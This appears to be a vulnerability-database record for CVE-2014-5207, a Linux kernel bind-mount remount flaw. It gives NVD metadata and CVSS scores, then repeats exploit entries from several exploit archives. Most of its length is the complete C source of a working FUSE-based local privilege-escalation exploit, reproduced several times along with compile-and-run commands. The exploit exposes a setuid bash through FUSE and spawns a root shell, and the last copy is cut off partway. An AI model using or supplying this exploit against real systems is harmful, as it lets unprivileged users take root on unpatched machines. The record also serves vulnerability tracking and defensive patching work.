ID CVE-2014-5207 Type cve Reporter cve@mitre.org Modified 2020-08-14T18:14:00
Description
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a "mount -o remount" command within a user namespace.
{"id": "CVE-2014-5207", "bulletinFamily": "NVD", "title": "CVE-2014-5207", "description": "fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a \"mount -o remount\" command within a user namespace.", "published": "2014-08-18T11:15:00", "modified": "2020-08-14T18:14:00", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5207", "reporter": "cve@mitre.org", "references": ["http://osvdb.org/show/osvdb/110055", "http://www.securityfocus.com/bid/69216", "http://packetstormsecurity.com/files/128595/Linux-Kernel-3.16.1-FUSE-Privilege-Escalation.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1129662", "https://github.com/torvalds/linux/commit/9566d6742852c527bf5af38af5cbb878dad75705", "http://www.ubuntu.com/usn/USN-2317-1", "http://seclists.org/oss-sec/2014/q3/352", "https://exchange.xforce.ibmcloud.com/vulnerabilities/95266", "http://www.exploit-db.com/exploits/34923", "http://www.openwall.com/lists/oss-security/2014/08/13/4", "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=9566d6742852c527bf5af38af5cbb878dad75705", "http://www.ubuntu.com/usn/USN-2318-1"], "cvelist": ["CVE-2014-5207"], "type": "cve", "lastseen": "2020-12-09T19:58:25", "edition": 6, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:34923"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128595"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F8053CF56EBE8E6A9E4404FBAF8824B6"]}, {"type": "seebug", "idList": ["SSV:87322"]}, {"type": "zdt", "idList": ["1337DAY-ID-22736"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850628", "OPENVAS:1361412562311220191478", "OPENVAS:1361412562310841934", "OPENVAS:1361412562310868102", "OPENVAS:1361412562310841935", "OPENVAS:1361412562311220192599", "OPENVAS:1361412562310868101", "OPENVAS:1361412562311220201674", "OPENVAS:1361412562310120086"]}, {"type": "ubuntu", "idList": ["USN-2318-1", "USN-2317-1"]}, {"type": "amazon", "idList": ["ALAS-2014-417"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13914", "SECURITYVULNS:DOC:31007"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-2599.NASL", "UBUNTU_USN-2318-1.NASL", "FEDORA_2014-9449.NASL", "ALA_ALAS-2014-417.NASL", "OPENSUSE-2014-793.NASL", "FEDORA_2014-9466.NASL", "EULEROS_SA-2019-1478.NASL", "UBUNTU_USN-2317-1.NASL", "EULEROS_SA-2020-1674.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:1677-1"]}, {"type": "fedora", "idList": ["FEDORA:2BA602158D", "FEDORA:1835E22100"]}, {"type": "lenovo", "idList": ["LENOVO:PS500321-AMI-MEGARAC-SP-X-BMC-VULNERABILITIES-NOSID", "LENOVO:PS500321-NOSID"]}], "modified": "2020-12-09T19:58:25", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2020-12-09T19:58:25", "rev": 2}, "vulnersScore": 6.6}, "cpe": ["cpe:/o:linux:linux_kernel:3.16.1", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:14.04"], "affectedSoftware": [{"cpeName": "canonical:ubuntu_linux", "name": "canonical ubuntu linux", "operator": "eq", "version": "14.04"}, {"cpeName": "linux:linux_kernel", "name": "linux linux kernel", "operator": "le", "version": "3.16.1"}, {"cpeName": "canonical:ubuntu_linux", "name": "canonical ubuntu linux", "operator": "eq", "version": "12.04"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "HIGH", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 6.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 1.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*"], "cwe": ["CWE-269"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "versionEndIncluding": "3.16.1", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-04T00:13:21", "description": "Linux Kernel 3.16.1 - Remount FUSE Exploit. CVE-2014-5207. Local exploit for linux platform", "published": "2014-10-09T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.16.1 - Remount FUSE Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-09T00:00:00", "id": "EDB-ID:34923", "href": "https://www.exploit-db.com/exploits/34923/", "sourceData": "/*\r\n FUSE-based exploit for CVE-2014-5207\r\n Copyright (c) 2014 Andy Lutomirski\r\n\r\n Based on code that is:\r\n Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>\r\n\r\n This program can be distributed under the terms of the GNU GPL.\r\n See the file COPYING.\r\n\r\n gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid\r\n mkdir test\r\n ./fuse_suid test\r\n\r\n This isn't a work of art: it doesn't clean up after itself very well.\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n#define FUSE_USE_VERSION 26\r\n\r\n#include <fuse.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <err.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mount.h>\r\n#include <unistd.h>\r\n\r\nstatic const char *sh_path = \"/sh\";\r\nstatic int sh_fd;\r\nstatic loff_t sh_size;\r\n\r\nstatic int hello_getattr(const char *path, struct stat *stbuf)\r\n{\r\n int res = 0;\r\n\r\n memset(stbuf, 0, sizeof(struct stat));\r\n if (strcmp(path, \"/\") == 0) {\r\n stbuf->st_mode = S_IFDIR | 0755;\r\n stbuf->st_nlink = 2;\r\n } else if (strcmp(path, sh_path) == 0) {\r\n stbuf->st_mode = S_IFREG | 04755;\r\n stbuf->st_nlink = 1;\r\n stbuf->st_size = sh_size;\r\n } else\r\n res = -ENOENT;\r\n\r\n return res;\r\n}\r\n\r\nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,\r\n off_t offset, struct fuse_file_info *fi)\r\n{\r\n (void) offset;\r\n (void) fi;\r\n\r\n if (strcmp(path, \"/\") != 0)\r\n return -ENOENT;\r\n\r\n filler(buf, \".\", NULL, 0);\r\n filler(buf, \"..\", NULL, 0);\r\n filler(buf, sh_path + 1, NULL, 0);\r\n\r\n return 0;\r\n}\r\n\r\nstatic int hello_open(const char *path, struct fuse_file_info *fi)\r\n{\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n\r\n if ((fi->flags & 3) != O_RDONLY)\r\n return -EACCES;\r\n\r\n return 0;\r\n}\r\n\r\nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset,\r\n struct fuse_file_info *fi)\r\n{\r\n (void) fi;\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n\r\n return pread(sh_fd, buf, size, offset);\r\n}\r\n\r\nstatic struct fuse_operations hello_oper = {\r\n .getattr = hello_getattr,\r\n .readdir = hello_readdir,\r\n .open = hello_open,\r\n .read = hello_read,\r\n};\r\n\r\nstatic int evilfd = -1;\r\n\r\nstatic int child2(void *mnt_void)\r\n{\r\n const char *mountpoint = mnt_void;\r\n int fd2;\r\n\r\n if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)\r\n err(1, \"unshare\");\r\n\r\n if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)\r\n err(1, \"mount\");\r\n\r\n fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);\r\n if (fd2 == -1)\r\n err(1, \"open\");\r\n\r\n if (dup3(fd2, evilfd, O_CLOEXEC) == -1)\r\n err(1, \"dup3\");\r\n close(fd2);\r\n\r\n printf(\"Mount hackery seems to have worked.\\n\");\r\n\r\n exit(0);\r\n}\r\n\r\nstatic int child1(const char *mountpoint)\r\n{\r\n char child2stack[2048];\r\n char evil_path[1024];\r\n\r\n evilfd = dup(0);\r\n if (evilfd == -1)\r\n err(1, \"dup\");\r\n\r\n if (clone(child2, child2stack,\r\n CLONE_FILES | CLONE_VFORK,\r\n (void *)mountpoint) == -1)\r\n err(1, \"clone\");\r\n\r\n printf(\"Here goes...\\n\");\r\n\r\n sprintf(evil_path, \"/proc/self/fd/%d/sh\", evilfd);\r\n execl(evil_path, \"sh\", \"-p\", NULL);\r\n perror(evil_path);\r\n return 1;\r\n}\r\n\r\nstatic int fuse_main_suid(int argc, char *argv[],\r\n const struct fuse_operations *op,\r\n void *user_data)\r\n{\r\n struct fuse *fuse;\r\n char *mountpoint;\r\n int multithreaded;\r\n int res;\r\n\r\n if (argc != 2) {\r\n printf(\"Usage: fuse_suid <mountpoint>\\n\");\r\n return -EINVAL;\r\n }\r\n\r\n char *args[] = {\"fuse_suid\", \"-f\", \"--\", argv[1], NULL};\r\n\r\n fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,\r\n op, sizeof(*op), &mountpoint,\r\n &multithreaded, user_data);\r\n if (fuse == NULL)\r\n return 1;\r\n\r\n printf(\"FUSE initialized. Time to have some fun...\\n\");\r\n printf(\"Warning: this exploit hangs on exit. Hit Ctrl-C when done.\\n\");\r\n if (fork() == 0)\r\n _exit(child1(mountpoint));\r\n\r\n if (multithreaded)\r\n res = fuse_loop_mt(fuse);\r\n else\r\n res = fuse_loop(fuse);\r\n\r\n fuse_teardown(fuse, mountpoint);\r\n if (res == -1)\r\n return 1;\r\n\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n sh_fd = open(\"/bin/bash\", O_RDONLY);\r\n if (sh_fd == -1)\r\n err(1, \"sh\");\r\n sh_size = lseek(sh_fd, 0, SEEK_END);\r\n return fuse_main_suid(argc, argv, &hello_oper, NULL);\r\n}", "cvss": {"score": 6.0, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34923/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:25", "description": "", "published": "2014-10-08T00:00:00", "type": "packetstorm", "title": "Linux Kernel 3.16.1 FUSE Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-08T00:00:00", "id": "PACKETSTORM:128595", "href": "https://packetstormsecurity.com/files/128595/Linux-Kernel-3.16.1-FUSE-Privilege-Escalation.html", "sourceData": "`I've been sitting on this for too long. CVE-2014-5207 was an \ninteresting bug found by Kenton Varda and Eric Biederman. Here's a \nsomewhat ugly PoC root exploit. You'll need the ability to use FUSE, \nalthough variants would work with removable media or network file \nsystems, too. \n \n--Andy \n \n/* \nFUSE-based exploit for CVE-2014-5207 \nCopyright (c) 2014 Andy Lutomirski \n \nBased on code that is: \nCopyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu> \n \nThis program can be distributed under the terms of the GNU GPL. \nSee the file COPYING. \n \ngcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid \nmkdir test \n./fuse_suid test \n \nThis isn't a work of art: it doesn't clean up after itself very well. \n*/ \n \n#define _GNU_SOURCE \n#define FUSE_USE_VERSION 26 \n \n#include <fuse.h> \n#include <stdio.h> \n#include <string.h> \n#include <errno.h> \n#include <fcntl.h> \n#include <err.h> \n#include <sched.h> \n#include <stdlib.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n#include <sys/mount.h> \n#include <unistd.h> \n \nstatic const char *sh_path = \"/sh\"; \nstatic int sh_fd; \nstatic loff_t sh_size; \n \nstatic int hello_getattr(const char *path, struct stat *stbuf) \n{ \nint res = 0; \n \nmemset(stbuf, 0, sizeof(struct stat)); \nif (strcmp(path, \"/\") == 0) { \nstbuf->st_mode = S_IFDIR | 0755; \nstbuf->st_nlink = 2; \n} else if (strcmp(path, sh_path) == 0) { \nstbuf->st_mode = S_IFREG | 04755; \nstbuf->st_nlink = 1; \nstbuf->st_size = sh_size; \n} else \nres = -ENOENT; \n \nreturn res; \n} \n \nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler, \noff_t offset, struct fuse_file_info *fi) \n{ \n(void) offset; \n(void) fi; \n \nif (strcmp(path, \"/\") != 0) \nreturn -ENOENT; \n \nfiller(buf, \".\", NULL, 0); \nfiller(buf, \"..\", NULL, 0); \nfiller(buf, sh_path + 1, NULL, 0); \n \nreturn 0; \n} \n \nstatic int hello_open(const char *path, struct fuse_file_info *fi) \n{ \nif (strcmp(path, sh_path) != 0) \nreturn -ENOENT; \n \nif ((fi->flags & 3) != O_RDONLY) \nreturn -EACCES; \n \nreturn 0; \n} \n \nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset, \nstruct fuse_file_info *fi) \n{ \n(void) fi; \nif (strcmp(path, sh_path) != 0) \nreturn -ENOENT; \n \nreturn pread(sh_fd, buf, size, offset); \n} \n \nstatic struct fuse_operations hello_oper = { \n.getattr = hello_getattr, \n.readdir = hello_readdir, \n.open = hello_open, \n.read = hello_read, \n}; \n \nstatic int evilfd = -1; \n \nstatic int child2(void *mnt_void) \n{ \nconst char *mountpoint = mnt_void; \nint fd2; \n \nif (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0) \nerr(1, \"unshare\"); \n \nif (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0) \nerr(1, \"mount\"); \n \nfd2 = open(mountpoint, O_RDONLY | O_DIRECTORY); \nif (fd2 == -1) \nerr(1, \"open\"); \n \nif (dup3(fd2, evilfd, O_CLOEXEC) == -1) \nerr(1, \"dup3\"); \nclose(fd2); \n \nprintf(\"Mount hackery seems to have worked.\\n\"); \n \nexit(0); \n} \n \nstatic int child1(const char *mountpoint) \n{ \nchar child2stack[2048]; \nchar evil_path[1024]; \n \nevilfd = dup(0); \nif (evilfd == -1) \nerr(1, \"dup\"); \n \nif (clone(child2, child2stack, \nCLONE_FILES | CLONE_VFORK, \n(void *)mountpoint) == -1) \nerr(1, \"clone\"); \n \nprintf(\"Here goes...\\n\"); \n \nsprintf(evil_path, \"/proc/self/fd/%d/sh\", evilfd); \nexecl(evil_path, \"sh\", \"-p\", NULL); \nperror(evil_path); \nreturn 1; \n} \n \nstatic int fuse_main_suid(int argc, char *argv[], \nconst struct fuse_operations *op, \nvoid *user_data) \n{ \nstruct fuse *fuse; \nchar *mountpoint; \nint multithreaded; \nint res; \n \nif (argc != 2) { \nprintf(\"Usage: fuse_suid <mountpoint>\\n\"); \nreturn -EINVAL; \n} \n \nchar *args[] = {\"fuse_suid\", \"-f\", \"--\", argv[1], NULL}; \n \nfuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args, \nop, sizeof(*op), &mountpoint, \n&multithreaded, user_data); \nif (fuse == NULL) \nreturn 1; \n \nprintf(\"FUSE initialized. Time to have some fun...\\n\"); \nprintf(\"Warning: this exploit hangs on exit. Hit Ctrl-C when done.\\n\"); \nif (fork() == 0) \n_exit(child1(mountpoint)); \n \nif (multithreaded) \nres = fuse_loop_mt(fuse); \nelse \nres = fuse_loop(fuse); \n \nfuse_teardown(fuse, mountpoint); \nif (res == -1) \nreturn 1; \n \nreturn 0; \n} \n \nint main(int argc, char *argv[]) \n{ \nsh_fd = open(\"/bin/bash\", O_RDONLY); \nif (sh_fd == -1) \nerr(1, \"sh\"); \nsh_size = lseek(sh_fd, 0, SEEK_END); \nreturn fuse_main_suid(argc, argv, &hello_oper, NULL); \n} \n \n \n`\n", "cvss": {"score": 6.0, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128595/fuse-escalate.txt"}], "seebug": [{"lastseen": "2017-11-19T13:11:52", "description": "No description provided by source.", "published": "2014-10-10T00:00:00", "type": "seebug", "title": "Linux Kernel remount FUSE Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87322", "id": "SSV:87322", "sourceData": "\n /*\r\n FUSE-based exploit for CVE-2014-5207\r\n Copyright (c) 2014 Andy Lutomirski\r\n \r\n Based on code that is:\r\n Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>\r\n \r\n This program can be distributed under the terms of the GNU GPL.\r\n See the file COPYING.\r\n \r\n gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid\r\n mkdir test\r\n ./fuse_suid test\r\n \r\n This isn't a work of art: it doesn't clean up after itself very well.\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#define FUSE_USE_VERSION 26\r\n \r\n#include <fuse.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <err.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mount.h>\r\n#include <unistd.h>\r\n \r\nstatic const char *sh_path = "/sh";\r\nstatic int sh_fd;\r\nstatic loff_t sh_size;\r\n \r\nstatic int hello_getattr(const char *path, struct stat *stbuf)\r\n{\r\n int res = 0;\r\n \r\n memset(stbuf, 0, sizeof(struct stat));\r\n if (strcmp(path, "/") == 0) {\r\n stbuf->st_mode = S_IFDIR | 0755;\r\n stbuf->st_nlink = 2;\r\n } else if (strcmp(path, sh_path) == 0) {\r\n stbuf->st_mode = S_IFREG | 04755;\r\n stbuf->st_nlink = 1;\r\n stbuf->st_size = sh_size;\r\n } else\r\n res = -ENOENT;\r\n \r\n return res;\r\n}\r\n \r\nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,\r\n off_t offset, struct fuse_file_info *fi)\r\n{\r\n (void) offset;\r\n (void) fi;\r\n \r\n if (strcmp(path, "/") != 0)\r\n return -ENOENT;\r\n \r\n filler(buf, ".", NULL, 0);\r\n filler(buf, "..", NULL, 0);\r\n filler(buf, sh_path + 1, NULL, 0);\r\n \r\n return 0;\r\n}\r\n \r\nstatic int hello_open(const char *path, struct fuse_file_info *fi)\r\n{\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n \r\n if ((fi->flags & 3) != O_RDONLY)\r\n return -EACCES;\r\n \r\n return 0;\r\n}\r\n \r\nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset,\r\n struct fuse_file_info *fi)\r\n{\r\n (void) fi;\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n \r\n return pread(sh_fd, buf, size, offset);\r\n}\r\n \r\nstatic struct fuse_operations hello_oper = {\r\n .getattr = hello_getattr,\r\n .readdir = hello_readdir,\r\n .open = hello_open,\r\n .read = hello_read,\r\n};\r\n \r\nstatic int evilfd = -1;\r\n \r\nstatic int child2(void *mnt_void)\r\n{\r\n const char *mountpoint = mnt_void;\r\n int fd2;\r\n \r\n if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)\r\n err(1, "unshare");\r\n \r\n if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)\r\n err(1, "mount");\r\n \r\n fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);\r\n if (fd2 == -1)\r\n err(1, "open");\r\n \r\n if (dup3(fd2, evilfd, O_CLOEXEC) == -1)\r\n err(1, "dup3");\r\n close(fd2);\r\n \r\n printf("Mount hackery seems to have worked.\\n");\r\n \r\n exit(0);\r\n}\r\n \r\nstatic int child1(const char *mountpoint)\r\n{\r\n char child2stack[2048];\r\n char evil_path[1024];\r\n \r\n evilfd = dup(0);\r\n if (evilfd == -1)\r\n err(1, "dup");\r\n \r\n if (clone(child2, child2stack,\r\n CLONE_FILES | CLONE_VFORK,\r\n (void *)mountpoint) == -1)\r\n err(1, "clone");\r\n \r\n printf("Here goes...\\n");\r\n \r\n sprintf(evil_path, "/proc/self/fd/%d/sh", evilfd);\r\n execl(evil_path, "sh", "-p", NULL);\r\n perror(evil_path);\r\n return 1;\r\n}\r\n \r\nstatic int fuse_main_suid(int argc, char *argv[],\r\n const struct fuse_operations *op,\r\n void *user_data)\r\n{\r\n struct fuse *fuse;\r\n char *mountpoint;\r\n int multithreaded;\r\n int res;\r\n \r\n if (argc != 2) {\r\n printf("Usage: fuse_suid <mountpoint>\\n");\r\n return -EINVAL;\r\n }\r\n \r\n char *args[] = {"fuse_suid", "-f", "--", argv[1], NULL};\r\n \r\n fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,\r\n op, sizeof(*op), &mountpoint,\r\n &multithreaded, user_data);\r\n if (fuse == NULL)\r\n return 1;\r\n \r\n printf("FUSE initialized. Time to have some fun...\\n");\r\n printf("Warning: this exploit hangs on exit. Hit Ctrl-C when done.\\n");\r\n if (fork() == 0)\r\n _exit(child1(mountpoint));\r\n \r\n if (multithreaded)\r\n res = fuse_loop_mt(fuse);\r\n else\r\n res = fuse_loop(fuse);\r\n \r\n fuse_teardown(fuse, mountpoint);\r\n if (res == -1)\r\n return 1;\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n sh_fd = open("/bin/bash", O_RDONLY);\r\n if (sh_fd == -1)\r\n err(1, "sh");\r\n sh_size = lseek(sh_fd, 0, SEEK_END);\r\n return fuse_main_suid(argc, argv, &hello_oper, NULL);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87322", "cvss": {"score": 6.0, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 3.16.1 - Remount FUSE Local Privilege Escalation", "edition": 1, "published": "2014-10-09T00:00:00", "title": "Linux Kernel 3.16.1 - Remount FUSE Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-09T00:00:00", "id": "EXPLOITPACK:F8053CF56EBE8E6A9E4404FBAF8824B6", "href": "", "sourceData": "/*\n FUSE-based exploit for CVE-2014-5207\n Copyright (c) 2014 Andy Lutomirski\n\n Based on code that is:\n Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>\n\n This program can be distributed under the terms of the GNU GPL.\n See the file COPYING.\n\n gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid\n mkdir test\n ./fuse_suid test\n\n This isn't a work of art: it doesn't clean up after itself very well.\n*/\n\n#define _GNU_SOURCE\n#define FUSE_USE_VERSION 26\n\n#include <fuse.h>\n#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <fcntl.h>\n#include <err.h>\n#include <sched.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <sys/mount.h>\n#include <unistd.h>\n\nstatic const char *sh_path = \"/sh\";\nstatic int sh_fd;\nstatic loff_t sh_size;\n\nstatic int hello_getattr(const char *path, struct stat *stbuf)\n{\n int res = 0;\n\n memset(stbuf, 0, sizeof(struct stat));\n if (strcmp(path, \"/\") == 0) {\n stbuf->st_mode = S_IFDIR | 0755;\n stbuf->st_nlink = 2;\n } else if (strcmp(path, sh_path) == 0) {\n stbuf->st_mode = S_IFREG | 04755;\n stbuf->st_nlink = 1;\n stbuf->st_size = sh_size;\n } else\n res = -ENOENT;\n\n return res;\n}\n\nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,\n off_t offset, struct fuse_file_info *fi)\n{\n (void) offset;\n (void) fi;\n\n if (strcmp(path, \"/\") != 0)\n return -ENOENT;\n\n filler(buf, \".\", NULL, 0);\n filler(buf, \"..\", NULL, 0);\n filler(buf, sh_path + 1, NULL, 0);\n\n return 0;\n}\n\nstatic int hello_open(const char *path, struct fuse_file_info *fi)\n{\n if (strcmp(path, sh_path) != 0)\n return -ENOENT;\n\n if ((fi->flags & 3) != O_RDONLY)\n return -EACCES;\n\n return 0;\n}\n\nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset,\n struct fuse_file_info *fi)\n{\n (void) fi;\n if (strcmp(path, sh_path) != 0)\n return -ENOENT;\n\n return pread(sh_fd, buf, size, offset);\n}\n\nstatic struct fuse_operations hello_oper = {\n .getattr = hello_getattr,\n .readdir = hello_readdir,\n .open = hello_open,\n .read = hello_read,\n};\n\nstatic int evilfd = -1;\n\nstatic int child2(void *mnt_void)\n{\n const char *mountpoint = mnt_void;\n int fd2;\n\n if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)\n err(1, \"unshare\");\n\n if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)\n err(1, \"mount\");\n\n fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);\n if (fd2 == -1)\n err(1, \"open\");\n\n if (dup3(fd2, evilfd, O_CLOEXEC) == -1)\n err(1, \"dup3\");\n close(fd2);\n\n printf(\"Mount hackery seems to have worked.\\n\");\n\n exit(0);\n}\n\nstatic int child1(const char *mountpoint)\n{\n char child2stack[2048];\n char evil_path[1024];\n\n evilfd = dup(0);\n if (evilfd == -1)\n err(1, \"dup\");\n\n if (clone(child2, child2stack,\n CLONE_FILES | CLONE_VFORK,\n (void *)mountpoint) == -1)\n err(1, \"clone\");\n\n printf(\"Here goes...\\n\");\n\n sprintf(evil_path, \"/proc/self/fd/%d/sh\", evilfd);\n execl(evil_path, \"sh\", \"-p\", NULL);\n perror(evil_path);\n return 1;\n}\n\nstatic int fuse_main_suid(int argc, char *argv[],\n const struct fuse_operations *op,\n void *user_data)\n{\n struct fuse *fuse;\n char *mountpoint;\n int multithreaded;\n int res;\n\n if (argc != 2) {\n printf(\"Usage: fuse_suid <mountpoint>\\n\");\n return -EINVAL;\n }\n\n char *args[] = {\"fuse_suid\", \"-f\", \"--\", argv[1], NULL};\n\n fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,\n op, sizeof(*op), &mountpoint,\n &multithreaded, user_data);\n if (fuse == NULL)\n return 1;\n\n printf(\"FUSE initialized. Time to have some fun...\\n\");\n printf(\"Warning: this exploit hangs on exit. Hit Ctrl-C when done.\\n\");\n if (fork() == 0)\n _exit(child1(mountpoint));\n\n if (multithreaded)\n res = fuse_loop_mt(fuse);\n else\n res = fuse_loop(fuse);\n\n fuse_teardown(fuse, mountpoint);\n if (res == -1)\n return 1;\n\n return 0;\n}\n\nint main(int argc, char *argv[])\n{\n sh_fd = open(\"/bin/bash\", O_RDONLY);\n if (sh_fd == -1)\n err(1, \"sh\");\n sh_size = lseek(sh_fd, 0, SEEK_END);\n return fuse_main_suid(argc, argv, &hello_oper, NULL);\n}", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-03T17:04:19", "description": "FUSE-based exploit that leverages a flaw in fs/namespace.c where it does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges. Linux kernels through 3.16.1 are affected.", "edition": 2, "published": "2014-10-09T00:00:00", "type": "zdt", "title": "Linux Kernel 3.16.1 FUSE Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-09T00:00:00", "id": "1337DAY-ID-22736", "href": "https://0day.today/exploit/description/22736", "sourceData": "/*\r\n FUSE-based exploit for CVE-2014-5207\r\n Copyright (c) 2014 Andy Lutomirski\r\n \r\n Based on code that is:\r\n Copyright (C) 2001-2007 Miklos Szeredi <[email\u00a0protected]>\r\n \r\n This program can be distributed under the terms of the GNU GPL.\r\n See the file COPYING.\r\n \r\n gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid\r\n mkdir test\r\n ./fuse_suid test\r\n \r\n This isn't a work of art: it doesn't clean up after itself very well.\r\n*/\r\n \r\n#define 